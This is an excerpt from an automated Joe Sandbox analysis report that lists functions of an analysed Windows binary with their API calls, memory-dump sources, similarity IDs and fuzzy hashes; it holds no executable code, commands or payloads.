Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 101376ce7403ce7d2dde2a22fb09534ce5fc4b2d05df32ab74de6c2242a01df5
Instruction ID: e6473c39a76f0fa1959e48761fc31cc664a5d88cbec43933def4d5869c8f9d4a
Opcode Fuzzy Hash: 101376ce7403ce7d2dde2a22fb09534ce5fc4b2d05df32ab74de6c2242a01df5
Instruction Fuzzy Hash: 60D0C730610713CFEB208F36D86824276E4AF02245F02CC3E94CACA181E6B8C4C0CB90

Function 00FD1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00FD1718
__swprintf.LIBCMT ref: 00FD1749

Strings

%.3d, xrefs: 00FD1723
WIN_XPe, xrefs: 00FD1788

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: ba503b821c0273546a28dbb624113aae31787eef43c5ad3433e6b55757c4936c
Instruction ID: fcf2277d62288e35964cced29e14f0cd71a82e1fe3847569d8d5454d96c169e7
Opcode Fuzzy Hash: ba503b821c0273546a28dbb624113aae31787eef43c5ad3433e6b55757c4936c
Instruction Fuzzy Hash: E1D01273844108FACB1496919888EF9777DB708301F180563F80692160E2259B98FA21

Function 00FE717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e68086f45a2faa405d0403bcdc0c9becb48f4f73fde35871ca8e750569b2e75
Instruction ID: c5f9a44c7c5d6d29ee6e8a3b461fcc49cda6a9d8d3d81ecab34549cd59a4da35
Opcode Fuzzy Hash: 5e68086f45a2faa405d0403bcdc0c9becb48f4f73fde35871ca8e750569b2e75
Instruction Fuzzy Hash: 49C1A075A04356EFDB14DFA5C884EAEBBB5FF48310B108598E805EB251D730ED81EB90

Function 0100E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0100E0BE
CharLowerBuffW.USER32(?,?), ref: 0100E101

Part of subcall function 0100D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0100D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0100E301
_memmove.LIBCMT ref: 0100E314

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: c92b2264bec28f65ded7afe5fcac3172ec6eac4d9961f7432fdfd61813ee1844
Instruction ID: 52ce90bb1ad9c02a7d62e6fc9984e09efe9f5c81ef8a7b59a732875773372ef0
Opcode Fuzzy Hash: c92b2264bec28f65ded7afe5fcac3172ec6eac4d9961f7432fdfd61813ee1844
Instruction Fuzzy Hash: 8FC17A716083018FD755DF28C880A6ABBE4FF89714F04896EF9999B391D731E945CF82

Function 01008093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 010080C3
CoUninitialize.OLE32 ref: 010080CE

Part of subcall function 00FED56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FED5D4

VariantInit.OLEAUT32(?), ref: 010080D9
VariantClear.OLEAUT32(?), ref: 010083AA

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 3cac6ec0fb34e87ae56a29dccbae86d1ebf5fb3fd30328189d5cca90b7e11ed6
Instruction ID: f77c854f7e22df3fcfc603a2bfcfdb4d5fd23a12a67c90cc0697d43b155f687b
Opcode Fuzzy Hash: 3cac6ec0fb34e87ae56a29dccbae86d1ebf5fb3fd30328189d5cca90b7e11ed6
Instruction Fuzzy Hash: 9CA17B356087019FEB51DF18C881B2AB7E4BF89314F09845DFA999B3A1DB78ED04CB42

Function 00FE7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01022C7C,?), ref: 00FE76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01022C7C,?), ref: 00FE7702
CLSIDFromProgID.OLE32(?,?,00000000,0101FB80,000000FF,?,00000000,00000800,00000000,?,01022C7C,?), ref: 00FE7727
_memcmp.LIBCMT ref: 00FE7748

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 08a3268421fb1c7ce9db613b9deb0ae217bd9f915d1b9f699c3558d300de8f64
Instruction ID: 46efe5d679031249ff70dcf0eeae0a38dcdf2551822358149f0e172765758132
Opcode Fuzzy Hash: 08a3268421fb1c7ce9db613b9deb0ae217bd9f915d1b9f699c3558d300de8f64
Instruction Fuzzy Hash: 39810B75A00209EFCB04DFA5C984EEEB7B9FF89315F204558E505AB250DB71AE06DB60

Function 00FE687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FE688E
SysAllocString.OLEAUT32(00000000), ref: 00FE6937
VariantCopy.OLEAUT32 ref: 00FE6966
VariantClear.OLEAUT32(?), ref: 00FE698D

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 99a31e1fd2cc0947a46854a08fd5ddfc265dd0a05b5828c5b35a8772e511e1df
Instruction ID: a139cd368cddf328e374fc9299130ae45d2f7fe274523c20459e7f6d809137b8
Opcode Fuzzy Hash: 99a31e1fd2cc0947a46854a08fd5ddfc265dd0a05b5828c5b35a8772e511e1df
Instruction Fuzzy Hash: 2C51F835B003499ADF20AF66C89173EB7E59F64750F20C82FE586D7291EE7CD840A701

Function 010197F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(01B40FD8,?), ref: 01019863
ScreenToClient.USER32(00000002,00000002), ref: 01019896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01019903

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: bd4c2ee165edfb5af7ddc238504a2a36a67b3b9ab3bc6a031f417bb285ee26db
Instruction ID: 43c17e7217c5927a0f54b60a377ffd53893a13aa3b5c620d915a898ea0fbaf50
Opcode Fuzzy Hash: bd4c2ee165edfb5af7ddc238504a2a36a67b3b9ab3bc6a031f417bb285ee26db
Instruction Fuzzy Hash: 98517034A00209EFDF25CF68C890AAE7BF6FF45364F108199F8959B295D739A941CB90

Function 00FE9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FE9AD2
__itow.LIBCMT ref: 00FE9B03

Part of subcall function 00FE9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FE9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FE9B6C
__itow.LIBCMT ref: 00FE9BC3

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 6d0f6e76c7f37e23fc79192174088690321aeeca82a77bef7307299892d5edc8
Instruction ID: 2386cf361196d3137e7df538783096a1a9eb56084cabc3abdfdf8d7cf32c0a02
Opcode Fuzzy Hash: 6d0f6e76c7f37e23fc79192174088690321aeeca82a77bef7307299892d5edc8
Instruction Fuzzy Hash: 3541A270A04348ABEF21EF55DC45BEE7BB9EF84720F000069F905A7291DBB89A44DB61

Function 010069AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 010069D1
WSAGetLastError.WSOCK32(00000000), ref: 010069E1

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01006A45
WSAGetLastError.WSOCK32(00000000), ref: 01006A51

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 0d3f14141f25c77a585bb1d917d55a44fc98e130d0f6de6ce0f3c9c939ff7896
Instruction ID: dbac715d777332982331e7324bc7b722e23cd1594c82963fb863d75706383ea6
Opcode Fuzzy Hash: 0d3f14141f25c77a585bb1d917d55a44fc98e130d0f6de6ce0f3c9c939ff7896
Instruction Fuzzy Hash: 6841AF347002006FFB61AF28CC86F3A77E99B45B54F44805CFA599B2C2DAB99D019B91

Function 0100641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0101F910), ref: 010064A7
_strlen.LIBCMT ref: 010064D9

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: a8e46b494eddb06225e10888707e499f8ec8b0ee25e153d6441f414d23183e70
Instruction ID: db09b5c8c142a3b09faf97f7bf05a968b57301583cc860869a168fca62b5ee5d
Opcode Fuzzy Hash: a8e46b494eddb06225e10888707e499f8ec8b0ee25e153d6441f414d23183e70
Instruction Fuzzy Hash: 60411630600104ABEB11EBA8DC95FBEB7A9AF44310F008158F8559B2D2DB39ED04DB50

Function 00FFB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FFB89E
GetLastError.KERNEL32(?,00000000), ref: 00FFB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FFB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FFB915

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 28b88487df90d1970069346ff60d066f2c4f60808a84c7d754ae7bf78ef89f23
Instruction ID: 58a3323a69a569230fdbec9e5a7c76c62516fc834eebe649e71918ec66b588c8
Opcode Fuzzy Hash: 28b88487df90d1970069346ff60d066f2c4f60808a84c7d754ae7bf78ef89f23
Instruction Fuzzy Hash: 3D413C39A00515DFDF10DF18C485A59BBE5AF89320F49808CED4AAB362DB79FD01EB91

Function 01018851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010188DE

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 9cdde2448a05f585ea7d732b2edb8ec336eeded2611df4158d51a2ec09244b78
Instruction ID: 03361dec2d1389b0837c4a460311ba198995f95a9c06208c5907cc1b46f7a993
Opcode Fuzzy Hash: 9cdde2448a05f585ea7d732b2edb8ec336eeded2611df4158d51a2ec09244b78
Instruction Fuzzy Hash: A2310634600109BFEF719A6CDC45BAD7BA6FB0A350F588143FAD1E61A9C63DE7408752

Function 0101AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0101AB60
GetWindowRect.USER32(?,?), ref: 0101ABD6
PtInRect.USER32(?,?,0101C014), ref: 0101ABE6
MessageBeep.USER32(00000000), ref: 0101AC57

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 90f6325ef1ccf8b6a98898f02282301580e8d04e15c077c631ab4c3050f11b32
Instruction ID: 2fb7d854b8765952acf0a2eb205f51b8cfcb3eba29ee2935638b9d6eea79c99b
Opcode Fuzzy Hash: 90f6325ef1ccf8b6a98898f02282301580e8d04e15c077c631ab4c3050f11b32
Instruction Fuzzy Hash: 5F418E30B01289DFDB22DF58C884BA97BF6FB49310F1484A9E9949B359D739A841CB90

Function 00FF0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FF0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00FF0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00FF0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00FF0BFB

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 57d62724473486b7a6c11a70b522e7488ad5dc9d79e1cac12ebfdf5e90176851
Instruction ID: 22f6439bbdcd8cb9cd22b6b2cf7875a0d2aa1aaf3abd759a55a7e9e9a053d4c8
Opcode Fuzzy Hash: 57d62724473486b7a6c11a70b522e7488ad5dc9d79e1cac12ebfdf5e90176851
Instruction Fuzzy Hash: FA310770D4025CAEFB308E258C05BFABBA5AF85328F14425AE791D21F3CB798944B755

Function 00FF0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00FF0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00FF0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00FF0CE1
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00FF0D33

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 76e27c5f8fdcbd3a61e04b67ba433c4064e5fadb90680b7b8de22d40bcb06fed
Instruction ID: 25aea08041e2d9039f2d3e133aa9b497d404a41b268217ad4ab8f37d1ef673f0
Opcode Fuzzy Hash: 76e27c5f8fdcbd3a61e04b67ba433c4064e5fadb90680b7b8de22d40bcb06fed
Instruction Fuzzy Hash: 10315830E0025CAEFF308A658C14BFEBBA6AF45330F04431AE694621E3DB399949A751

Function 00FC61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FC61FB
__isleadbyte_l.LIBCMT ref: 00FC6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FC6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FC628D

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a45383b0548f8bf392af1ca433680ffba2f579fe69179e8016613296a7186294
Instruction ID: 3d9620c4f7cbffe557785f632bad965cb1d611965b2db412d28ab2b506eee95a
Opcode Fuzzy Hash: a45383b0548f8bf392af1ca433680ffba2f579fe69179e8016613296a7186294
Instruction Fuzzy Hash: 9131CE31A08247AFDF218E65CE4AFAA7BA9BF42320F15402CE864C7191E731D950EB90

Function 01014EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 01014F02

Part of subcall function 00FF3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FF365B
Part of subcall function 00FF3641: GetCurrentThreadId.KERNEL32 ref: 00FF3662
Part of subcall function 00FF3641: AttachThreadInput.USER32(00000000,?,00FF5005), ref: 00FF3669

GetCaretPos.USER32(?), ref: 01014F13
ClientToScreen.USER32(00000000,?), ref: 01014F4E
GetForegroundWindow.USER32 ref: 01014F54

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 8f869d3f8dd8bd75774e5248ab12009c40637c7bfea82ceaa20d34fcaa57af20
Instruction ID: ccb973aefa712af9997b567da2736e60bd676ae7e2080c5ad64d542674c494dc
Opcode Fuzzy Hash: 8f869d3f8dd8bd75774e5248ab12009c40637c7bfea82ceaa20d34fcaa57af20
Instruction Fuzzy Hash: D8312B71E00108AFDB10EFA9CC859EFB7F9EF99300F01406AE455E7241EA799E058BA1

Function 0101C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

GetCursorPos.USER32(?), ref: 0101C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FCB9AB,?,?,?,?,?), ref: 0101C4E7
GetCursorPos.USER32(?), ref: 0101C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FCB9AB,?,?,?), ref: 0101C56E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

